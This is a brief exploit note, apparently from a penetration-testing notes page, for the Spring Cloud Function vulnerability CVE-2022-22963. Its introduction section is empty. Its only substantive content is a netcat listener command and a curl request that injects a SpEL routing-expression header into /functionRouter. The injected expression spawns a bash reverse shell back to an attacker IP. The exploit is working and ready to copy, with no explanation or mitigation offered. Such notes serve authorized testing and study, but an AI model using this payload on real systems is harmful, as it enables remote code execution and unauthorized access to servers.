Spring Cloud Function CVE-2022-22963
Introduction
CVE-2022-22963:
Exploitation
nc -lvnp 443curl -X POST http://10.10.10.10:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec /bin/bash -i &>/dev/tcp/10.10.10.10/443 <&1"})' --data-raw 'data' -v

Last updated